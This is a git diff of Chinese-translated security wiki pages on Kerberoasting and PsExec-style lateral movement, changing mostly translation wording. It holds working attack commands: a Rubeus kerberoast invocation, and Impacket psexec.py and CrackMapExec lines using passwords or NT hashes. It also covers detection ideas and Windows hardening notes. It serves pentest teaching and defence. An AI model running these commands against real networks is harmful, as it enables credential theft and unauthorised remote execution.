(PR #139): +```powershell +Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:domain.local /dc:dc.domain.local /nopreauth:NO_PREAUTH_USER /spn:TARGET_SERVICE +``` +相关 + +如果您针对 AS-REP 可烤用户,请参见: + +{{#ref}} +asreproast.md +{{#endref}} + +## 参考 - [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/) - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting) - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled) +- Microsoft Security Blog (2024-10-11) – Microsoft 的指导以帮助减轻 Kerberoasting: https://www.microsoft.com/en-us/security/blog/2024/10/11/microsofts-guidance-to-help-mitigate-kerberoasting/ +- SpecterOps – Rubeus Roasting 文档: https://docs.specterops.io/ghostpack/rubeus/roasting {{#include ../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/lateral-movement/psexec-and-winexec.md b/src/windows-hardening/lateral-movement/psexec-and-winexec.md index ec25855a0..8eb0d337f 100644 --- a/src/windows-hardening/lateral-movement/psexec-and-winexec.md +++ b/src/windows-hardening/lateral-movement/psexec-and-winexec.md @@ -13,8 +13,8 @@ 5. 停止服务并清理(删除服务和任何丢弃的二进制文件)。 要求/前提条件: -- 目标上的本地管理员 (SeCreateServicePrivilege) 或目标上的显式服务创建权限。 -- 可访问 SMB (445) 和可用的 ADMIN$ 共享;通过主机防火墙允许远程服务管理。 +- 目标上的本地管理员权限 (SeCreateServicePrivilege) 或明确的服务创建权限。 +- 可访问 SMB (445) 和可用的 ADMIN$ 共享;主机防火墙允许远程服务管理。 - UAC 远程限制:使用本地帐户时,令牌过滤可能会阻止网络上的管理员访问,除非使用内置管理员或 LocalAccountTokenFilterPolicy=1。 - Kerberos 与 NTLM:使用主机名/FQDN 启用 Kerberos;通过 IP 连接通常会回退到 NTLM(并可能在加固环境中被阻止)。 @@ -64,7 +64,7 @@ OPSEC ### Impacket psexec.py (类似 PsExec) -- 使用嵌入式 RemCom 类似服务。通过 ADMIN$ 投放一个临时服务二进制文件(通常是随机名称),创建一个服务(默认通常为 RemComSvc),并通过命名管道代理 I/O。 +- 使用嵌入式 RemCom 类服务。通过 ADMIN$ 投放一个临时服务二进制文件(通常是随机名称),创建一个服务(默认通常为 RemComSvc),并通过命名管道代理 I/O。 ```bash # Password auth psexec.py DOMAIN/user:Password@HOST cmd.exe @@ -114,7 +114,7 @@ cme smb HOST -u USER -H NTHASH -x "ipconfig /all" --exec-method smbexec - Sysinternals EULA的注册表伪影:HKCU\Software\Sysinternals\PsExec\EulaAccepted=0x1在操作员主机上(如果未被抑制)。 狩猎思路 -- 当ImagePath包含cmd.exe /c、powershell.exe或TEMP位置时,对服务安装发出警报。 +- 对于ImagePath包含cmd.exe /c、powershell.exe或TEMP位置的服务安装发出警报。 - 查找父映像为C:\Windows\PSEXESVC.exe或作为LOCAL SYSTEM运行的services.exe子进程的进程创建。 - 标记以-stdin/-stdout/-stderr结尾的命名管道或知名的PsExec克隆管道名称。 @@ -124,19 +124,21 @@ cme smb HOST -u USER -H NTHASH -x "ipconfig /all" --exec-method smbexec - Kerberos失败但NTLM被阻止:使用主机名/FQDN连接(而不是IP),确保正确的SPN,或在使用Impacket时提供-k/-no-pass和票证。 - 服务启动超时但有效载荷已运行:如果不是实际的服务二进制文件则是预期的;将输出捕获到文件或使用smbexec进行实时I/O。 -## Hardening notes (modern changes) +## Hardening notes - Windows 11 24H2和Windows Server 2025默认要求出站(以及Windows 11入站)连接的SMB签名。这不会破坏使用有效凭据的合法PsExec使用,但会防止未签名的SMB中继滥用,并可能影响不支持签名的设备。 -- 新的SMB客户端NTLM阻止(Windows 11 24H2/Server 2025)可以在通过IP连接或连接到非Kerberos服务器时防止NTLM回退。在强化环境中,这将破坏基于NTLM的PsExec/SMBExec;如果确实需要,请使用Kerberos(主机名/FQDN)或配置例外。 +- 新的SMB客户端NTLM阻止(Windows 11 24H2/Server 2025)可能会在通过IP连接或连接到非Kerberos服务器时阻止NTLM回退。在强化环境中,这将破坏基于NTLM的PsExec/SMBExec;如果确实需要,请使用Kerberos(主机名/FQDN)或配置例外。 - 最小权限原则:最小化本地管理员成员资格,优先使用及时/足够管理员,强制执行LAPS,并监控/警报7045服务安装。 ## See also - 基于WMI的远程执行(通常更无文件): + {{#ref}} ./wmiexec.md {{#endref}} - 基于WinRM的远程执行: + {{#ref}} ./winrm.md {{#endref}} @@ -146,5 +148,6 @@ cme smb HOST -u USER -H NTHASH -x "ipconfig /all" --exec-method smbexec ## References - PsExec - Sysinternals | Microsoft Learn: https://learn.microsoft.com/sysinternals/downloads/psexec -- Windows Server 2025和Windows 11中的SMB安全强化(默认签名,NTLM阻止):https://techcommunity.microsoft.com/blog/filecab/smb-security-hardening-in-windows-server-2025--windows-11/4226591 +- Windows Server 2025和Windows 11中的SMB安全强化(默认签名,NTLM阻止): https://techcommunity.microsoft.com/blog/filecab/smb-security-hardening-in-windows-server-2025--windows-11/4226591 + {{#include ../../banners/hacktricks-training.md}}